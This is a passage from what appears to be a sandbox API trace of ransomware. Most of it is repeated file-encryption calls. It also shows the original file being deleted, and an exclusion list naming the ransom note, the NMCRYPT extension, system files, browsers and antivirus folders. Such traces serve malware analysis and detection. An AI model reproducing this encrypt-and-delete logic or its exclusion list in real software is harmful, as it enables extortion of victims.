pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.633] GetLastError () returned 0x0 [0143.633] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.633] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.633] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.633] GetLastError () returned 0x0 [0143.633] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.633] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.633] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.633] GetLastError () returned 0x0 [0143.633] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.633] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.633] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.633] GetLastError () returned 0x0 [0143.633] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.633] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.633] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.633] GetLastError () returned 0x0 [0143.633] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.633] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.633] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.633] GetLastError () returned 0x0 [0143.633] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.633] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.633] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.634] GetLastError () returned 0x0 [0143.634] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.634] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.634] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.634] GetLastError () returned 0x0 [0143.634] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.634] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.634] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.634] GetLastError () returned 0x0 [0143.634] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.634] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.634] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.634] GetLastError () returned 0x0 [0143.634] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.634] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.634] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.634] GetLastError () returned 0x0 [0143.634] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.634] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.634] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.634] GetLastError () returned 0x0 [0143.634] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.634] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.634] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.634] GetLastError () returned 0x0 [0143.634] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.635] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.635] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.635] GetLastError () returned 0x0 [0143.635] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.635] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.635] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.635] GetLastError () returned 0x0 [0143.635] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.635] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.635] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.635] GetLastError () returned 0x0 [0143.635] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.635] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.635] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.635] GetLastError () returned 0x0 [0143.635] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.635] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.635] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.635] GetLastError () returned 0x0 [0143.635] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.000] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 1 [0144.000] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0 [0144.000] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" [0144.000] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0144.000] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA54E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa54e.tmp")) returned 0xa54e [0144.001] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA54E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa54e.tmp"), dwFlags=0x1) returned 0 [0144.001] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXA54E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxa54e.tmp")) returned 1 [0144.001] CryptDestroyKey (hKey=0x8bdd38) returned 1 [0144.001] wcslen (_String="OK") returned 0x2 [0144.001] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.001] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0144.001] CryptDestroyKey (hKey=0x8bdc78) returned 1 [0144.001] CryptDestroyHash (hHash=0x8bdbf8) returned 1 [0144.001] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0144.002] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.002] wcscmp (_String1="ar-SA", _String2=".") returned 1 [0144.002] wcscmp (_String1="ar-SA", _String2="..") returned 1 [0144.002] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.002] wcscmp (_String1="bg-BG", _String2=".") returned 1 [0144.002] wcscmp (_String1="bg-BG", _String2="..") returned 1 [0144.002] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*NMCRYPT") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*Recovers your files.html") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*.exe") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*.dll") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*.lnk") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*.bat") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*.ini") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*.msi") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*.scf") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*pagefile.sys*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*NTUSER.DAT*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*AppData*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\winrar\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\java\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\windows\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\ESET\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\AVG\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\AVIRA\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*Atheros*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*Realtek*") returned 0 [0144.002] PathMatchSpecW (pszFile="Content.xml", pszSpec="*bootmgr*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*boot*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*boot*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*CONFIG.SYS*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*IO.SYS*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*MSDOS.SYS*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*NTDETECT.COM*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*ntldr*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*chrome*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*opera*") returned 0 [0144.003] PathMatchSpecW (pszFile="Content.xml", pszSpec="*firefox*") returned 0 [0144.003] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml", pszSpec="*") returned 1 [0144.003] strlen (_Str="NMoreira") returned 0x8 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.003] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.004] 